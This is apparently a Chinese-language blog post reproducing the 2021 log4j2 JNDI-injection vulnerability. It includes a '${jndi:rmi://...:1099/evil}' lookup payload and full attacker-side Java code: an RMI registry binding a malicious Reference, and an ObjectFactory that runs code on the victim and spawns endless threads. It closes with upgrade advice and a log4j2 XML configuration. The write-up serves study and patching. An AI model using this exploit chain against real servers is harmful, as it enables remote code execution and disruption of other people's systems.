log4j2 2.14.0之前的版本出现重大漏洞
长话短说
lookup
这个是log4j2的一个功能,就是说你可以用
String javaCmd = "${java:os}";
LOGGER.info("javacmd: {}", javaCmd);
这种方式来打印系统的一些相关信息
而这种lookup好像是基于jndi,rmi,具体这两个东西是啥,请去google一下, 这里就不多说了。
jndi注入
这个也是一种大课题了,我前几天才知道有这个东西
直接上代码
环境介绍(最基本的maven项目)
- jdk1.8.0-291
- log4j2 2.14.0
注意log4j和log4j2还不一样,这两个虽然是同一作者,但是log4j是通过porperties配置了,log4j2可以通过xml配置
- maven 3.6.3
- idea 2021.1.2
主要是jdk版本和log4j2的版本
你的controller可能是这样写的
package com.syj.controller;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
/**
* lookup是基于jndi的jndi又基于rmi所以下面这个特殊命令就会出问题
*
* @author 儒雅随和的施兄
* @date 2021/12/11 15:18
*/
public class UserController {
private static final Logger LOGGER = LogManager.getLogger(UserController.class);
public static void main(String[] args) {
String bug = "${jndi:rmi://192.168.31.11:1099/evil}";
//tring username = "syj";
String javaCmd = "${java:os}";
//Key Description
//version The short Java version, like:Java version 1.7.0_67
//runtime The Java runtime version, like:Java(TM) SE Runtime Environment (build 1.7.0_67-b01) from Oracle Corporation
//vm The Java VM version, like:Java HotSpot(TM) 64-Bit Server VM (build 24.65-b04, mixed mode)
//osThe OS version, like:Windows 7 6.1 Service Pack 1, architecture: amd64-64
//locale Hardware information, like:default locale: en_US, platform encoding: Cp1252
//hw Hardware information, like:processors: 4, architecture: amd64-64, instruction sets: amd64
LOGGER.info("username: {}", javaCmd);
}
}
黑客的代码可能是这样写的
package com.syj.rmi;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.NamingException;
import javax.naming.Reference;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
/**
* @author 儒雅随和的施兄
* @date 2021/12/11 16:00
*/
public class RMIServer {
public static void main(String[] args) {
try {
LocateRegistry.createRegistry(1099);
Registry registry = LocateRegistry.getRegistry();
System.out.println("Create RMI register on port 1099");
Reference reference = new Reference("com.syj.rmi.Hacker","com.syj.rmi.Hacker",null);
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
registry.bind("evil",referenceWrapper);
} catch (RemoteException | NamingException | AlreadyBoundException e) {
e.printStackTrace();
}
}
}
package com.syj.rmi;
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;
import java.util.concurrent.LinkedBlockingQueue;
import java.util.concurrent.ThreadFactory;
import java.util.concurrent.ThreadPoolExecutor;
import java.util.concurrent.TimeUnit;
/**
* @author 儒雅随和的施兄
* @date 2021/12/11 16:02
*/
public class Hacker implements ObjectFactory {
static {
System.out.println("bangbangbang你被攻击了");
}
@Override
public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
int core = Runtime.getRuntime().availableProcessors();
ThreadPoolExecutor threadPoolExecutor = new ThreadPoolExecutor(core, core * 2, 5, TimeUnit.SECONDS, new LinkedBlockingQueue<>(), new ThreadFactory() {
@Override
public Thread newThread(Runnable r) {
return new Thread(r);
}
});
threadPoolExecutor.execute(()->{
while (true){
try {
TimeUnit.SECONDS.sleep(1);
System.out.println("连续攻击");
} catch (InterruptedException e) {
e.printStackTrace();
}
}
});
return null;
}
}
解释部分
- UserController
这个类模拟的是你的controller层代码,你会接收一个参数,然后对他做处理,然后不知道是哪里的原因,日志记录了前端的参数
- RMIServer
这个类你可以把它理解为一个rmi的注册中心,具体的原理太复杂了,我也不懂,baidu去吧
- Hacker
这个类就是黑客具体的业务类要实现ObjectFactory,其实这个是一个Obj的工厂类,在这个代码种工厂和产品都是一个东西了,做的比较简单,反正目的是达到了,已经能在对方的服务器里面做一些手脚了
UserController是服务器上的代码,RMIServer和Hacker是黑客电脑上的代码,jndi注入可以达到在服务器上调用远程服务,懂RPC的你就把他理解为RPC吧。
总结
昨天的漏洞,紧急bug,头一次感觉阿帕奇离自己如此的近,今天也是查找资料,把这个漏洞有可能出现的bug复现了一下,这个我觉得是一个参数问题,如果前后端不校验参数的话,就很危险,有可能就有恶意str跑到服务器上,即使不会有重大损失,冗余是一定会有的,所以一定要做参数处理。如果是框架内部的日志记录的恶意参数,那我们就干涉不聊了。。。。。。
解决方法
log4j2 的新版本已经解决这个问题了(2.15.0)
或者用别的日志代替log4j2
<?xml version="1.0" encoding="UTF-8"?>
<!--日志级别以及优先级排序: OFF > FATAL > ERROR > WARN > INFO > DEBUG > TRACE > ALL -->
<!--Configuration后面的status,这个用于设置log4j2自身内部的信息输出,可以不设置,当设置成trace时,你会看到log4j2内部各种详细输出-->
<!--monitorInterval:Log4j能够自动检测修改配置 文件和重新配置本身,设置间隔秒数-->
<configuration status="WARN" monitorInterval="30">
<!--先定义所有的appender-->
<appenders>
<!--这个输出控制台的配置-->
<console name="Console" target="SYSTEM_OUT">
<!--输出日志的格式-->
<PatternLayout pattern="[%d{HH:mm:ss:SSS}] [%p] - %l - %m%n"/>
</console>
<!--文件会打印出所有信息,这个log每次运行程序会自动清空,由append属性决定,这个也挺有用的,适合临时测试用-->
<File name="fileLog" fileName="log/log4j2.log" append="false">
<PatternLayout pattern="%d{HH:mm:ss.SSS} %-5level %class{36} %L %M - %msg%xEx%n"/>
</File>
<!-- 这个会打印出所有的info及以下级别的信息,每次大小超过size,则这size大小的日志会自动存入按年份-月份建立的文件夹下面并进行压缩,作为存档-->
<RollingFile name="RollingFileInfo" fileName="${sys:user.home}/logs/info.log"
filePattern="${sys:user.home}/logs/$${date:yyyy-MM}/info-%d{yyyy-MM-dd}-%i.log">
<!--控制台只输出level及以上级别的信息(onMatch),其他的直接拒绝(onMismatch)-->
<ThresholdFilter level="info" onMatch="ACCEPT" onMismatch="DENY"/>
<PatternLayout pattern="[%d{HH:mm:ss:SSS}] [%p] - %l - %m%n"/>
<Policies>
<TimeBasedTriggeringPolicy/>
<SizeBasedTriggeringPolicy size="100 MB"/>
</Policies>
</RollingFile>
<RollingFile name="RollingFileWarn" fileName="${sys:user.home}/logs/warn.log"
filePattern="${sys:user.home}/logs/$${date:yyyy-MM}/warn-%d{yyyy-MM-dd}-%i.log">
<ThresholdFilter level="warn" onMatch="ACCEPT" onMismatch="DENY"/>
<PatternLayout pattern="[%d{HH:mm:ss:SSS}] [%p] - %l - %m%n"/>
<Policies>
<TimeBasedTriggeringPolicy/>
<SizeBasedTriggeringPolicy size="100 MB"/>
</Policies>
<!-- DefaultRolloverStrategy属性如不设置,则默认为最多同一文件夹下7个文件,这里设置了20 -->
<DefaultRolloverStrategy max="20"/>
</RollingFile>
<RollingFile name="RollingFileError" fileName="${sys:user.home}/logs/error.log"
filePattern="${sys:user.home}/logs/$${date:yyyy-MM}/error-%d{yyyy-MM-dd}-%i.log">
<ThresholdFilter level="error" onMatch="ACCEPT" onMismatch="DENY"/>
<PatternLayout pattern="[%d{HH:mm:ss:SSS}] [%p] - %l - %m%n"/>
<Policies>
<TimeBasedTriggeringPolicy/>
<SizeBasedTriggeringPolicy size="100 MB"/>
</Policies>
</RollingFile>
</appenders>
然后定义logger,只有定义了logger并引入的appender,appender才会生效
<loggers>
<!--过滤掉spring和mybatis的一些无用的DEBUG信息-->
<!-- <logger name="org.springframework" level="INFO"></logger>-->
<!-- <logger name="org.mybatis" level="INFO"></logger>-->
<root level="all">
<appender-ref ref="Console"/>
<appender-ref ref="fileLog"/>
<appender-ref ref="RollingFileInfo"/>
<appender-ref ref="RollingFileWarn"/>
<appender-ref ref="RollingFileError"/>
</root>
</loggers>
</configuration>